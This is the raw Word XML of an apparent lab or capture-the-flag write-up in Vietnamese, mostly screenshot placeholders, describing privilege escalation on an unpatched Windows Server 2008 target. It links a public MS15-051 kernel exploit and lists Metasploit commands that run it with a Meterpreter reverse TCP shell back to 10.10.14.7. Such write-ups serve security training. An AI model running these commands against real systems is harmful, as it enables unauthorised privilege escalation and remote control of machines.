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138CE" w14:textId="1DA5372D" w:rsidR="002F49FE" w:rsidRDefault="006033B5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44474EE3" wp14:editId="1BA85CE6">
            <wp:extent cx="5943600" cy="2621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66428672" w14:textId="212CC019" w:rsidR="009C0DFC" w:rsidRDefault="009C0DFC"/>
    <w:p w14:paraId="4CD23C26" w14:textId="11F5F3D4" w:rsidR="009C0DFC" w:rsidRPr="009C0DFC" w:rsidRDefault="009C0DFC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C0DFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2397D466" w14:textId="12BC125E" w:rsidR="009C0DFC" w:rsidRDefault="009C0DFC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5419544C" w14:textId="202CF011" w:rsidR="009C0DFC" w:rsidRDefault="009C0DFC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Giao diện trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77027472" w14:textId="343A2310" w:rsidR="009C0DFC" w:rsidRDefault="009C0DFC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355FFB26" w14:textId="09706DFC" w:rsidR="009C0DFC" w:rsidRDefault="009C0DFC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F475107" wp14:editId="5452D98A">
            <wp:extent cx="5268686" cy="3221704"/>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8609" r="2734" b="13260"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269449" cy="3222171"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="393810C6" w14:textId="7BA98D71" w:rsidR="009C0DFC" w:rsidRDefault="00352AFA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74759CAE" wp14:editId="5ABB900B">
            <wp:extent cx="5943600" cy="1763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b="12696"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1763486"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A41C6A" w14:textId="77777777" w:rsidR="00352AFA" w:rsidRDefault="00352AFA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4019CFA0" w14:textId="6891D1AA" w:rsidR="009C0DFC" w:rsidRDefault="00681598">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7476BFBA" wp14:editId="7939D3AE">
            <wp:extent cx="5943600" cy="2576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p>
    <w:p w14:paraId="3D255547" w14:textId="5C455B8F" w:rsidR="00943132" w:rsidRDefault="00943132">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD663D3" w14:textId="40B732E3" w:rsidR="00943132" w:rsidRDefault="008616CE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44E1A008" wp14:editId="422C8355">
            <wp:extent cx="5943600" cy="3355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303141BF" w14:textId="3C552B93" w:rsidR="000B3F4B" w:rsidRDefault="000B3F4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ED3526B" wp14:editId="79B51DC5">
            <wp:extent cx="5943600" cy="2889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5497574D" w14:textId="77777777" w:rsidR="000B3F4B" w:rsidRDefault="000B3F4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7991B303" w14:textId="0FC75142" w:rsidR="00246E6F" w:rsidRDefault="00246E6F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E9A719A" wp14:editId="4C7EECF4">
            <wp:extent cx="5943600" cy="1558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558290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C850CFE" w14:textId="47505912" w:rsidR="00932B48" w:rsidRDefault="00932B48">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7075D77C" w14:textId="77777777" w:rsidR="00932B48" w:rsidRDefault="00932B48">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCAC8B8" w14:textId="756F9F0A" w:rsidR="00681598" w:rsidRDefault="00932B48">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D136273" wp14:editId="1100CCB3">
            <wp:extent cx="5397500" cy="46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397500" cy="469900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40595CA1" w14:textId="2D92C996" w:rsidR="00D752CF" w:rsidRDefault="00D752CF" w:rsidP="00D6080E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A4B8427" w14:textId="5FF79F79" w:rsidR="00932B48" w:rsidRDefault="006029D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00875C3B" wp14:editId="23A08413">
            <wp:extent cx="5257800" cy="170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257800" cy="1701800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ADC53E" w14:textId="5A749EA8" w:rsidR="006029D8" w:rsidRDefault="006029D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F789A5" w14:textId="3823FB9D" w:rsidR="006029D8" w:rsidRDefault="005501C4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vì mục tiêu cài đặt Windows Server 2008, rất dễ khai thác. Không có service packs hoặc hotfixes được cài đặt. Nghiên cứu một số khai thác Windows kernel nhưng cái đáng tin cậy nhất là MS15-051.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57788DED" w14:textId="46E99969" w:rsidR="005501C4" w:rsidRDefault="005501C4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAF2298" w14:textId="55FEA3F1" w:rsidR="005501C4" w:rsidRDefault="005501C4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit: </w:t>
      </w:r>
      <w:r w:rsidRPr="005501C4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E42F4A" w14:textId="60F70272" w:rsidR="00D3528B" w:rsidRDefault="00D3528B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F25C413" w14:textId="33FF6B85" w:rsidR="00D3528B" w:rsidRDefault="00D3528B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khai thác này có sẵn trong Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CCA61B" w14:textId="0E0D3D04" w:rsidR="00D3528B" w:rsidRDefault="00D3528B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CEA88D0" w14:textId="3B88BA95" w:rsidR="00D3528B" w:rsidRPr="00453273" w:rsidRDefault="002B2C45">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453273">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidRPr="00453273">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit/windows/local/ms15_051_client_copy_image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076AC2AB" w14:textId="7F431B74" w:rsidR="002B2C45" w:rsidRPr="00453273" w:rsidRDefault="001C2BC0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453273">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set payload windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8139CF" w14:textId="2BC967FB" w:rsidR="001C2BC0" w:rsidRPr="00453273" w:rsidRDefault="001C2BC0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453273">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set lhost 10.10.14.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A6E432" w14:textId="605FA5C7" w:rsidR="001C2BC0" w:rsidRPr="00453273" w:rsidRDefault="001C2BC0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453273">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5067B09D" w14:textId="260AB9F1" w:rsidR="001C2BC0" w:rsidRPr="00453273" w:rsidRDefault="001C2BC0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453273">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048C1697" w14:textId="524BF7F6" w:rsidR="001C2BC0" w:rsidRPr="00453273" w:rsidRDefault="001C2BC0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453273">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47746FCF" w14:textId="58F23110" w:rsidR="001C2BC0" w:rsidRDefault="001C2BC0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E511CFC" w14:textId="7581D726" w:rsidR="001C2BC0" w:rsidRDefault="00453273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BCDC9DC" wp14:editId="0A7FEB2A">
            <wp:extent cx="5943600" cy="2379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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="054BDCBE" w14:textId="4A60143A" w:rsidR="005501C4" w:rsidRDefault="005501C4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F4DF8B" w14:textId="4499954D" w:rsidR="005501C4" w:rsidRPr="009C0DFC" w:rsidRDefault="00A647FF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5301949F" wp14:editId="2C4CAB1E">
            <wp:extent cx="5943600" cy="44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444500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005501C4" w:rsidRPr="009C0D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CCE"/>
    <w:rsid w:val="000B3F4B"/>
    <w:rsid w:val="001C2BC0"/>
    <w:rsid w:val="00246E6F"/>
    <w:rsid w:val="002B2C45"/>
    <w:rsid w:val="002D02AF"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00352AFA"/>
    <w:rsid w:val="003572D0"/>
    <w:rsid w:val="00453273"/>
    <w:rsid w:val="005501C4"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="006029D8"/>
    <w:rsid w:val="006033B5"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="00681598"/>
    <w:rsid w:val="008616CE"/>
    <w:rsid w:val="00932B48"/>
    <w:rsid w:val="00943132"/>
    <w:rsid w:val="009C0DFC"/>
    <w:rsid w:val="009C5E9A"/>
    <w:rsid w:val="00A647FF"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00D3528B"/>
    <w:rsid w:val="00D6080E"/>
    <w:rsid w:val="00D752CF"/>
    <w:rsid w:val="00E26CCE"/>
    <w:rsid w:val="00EC103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084E6A1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8C233D1A-2A71-EB48-98F3-861132D9A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80</Words>
  <Characters>460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2024-07-15T04:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-15T10:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>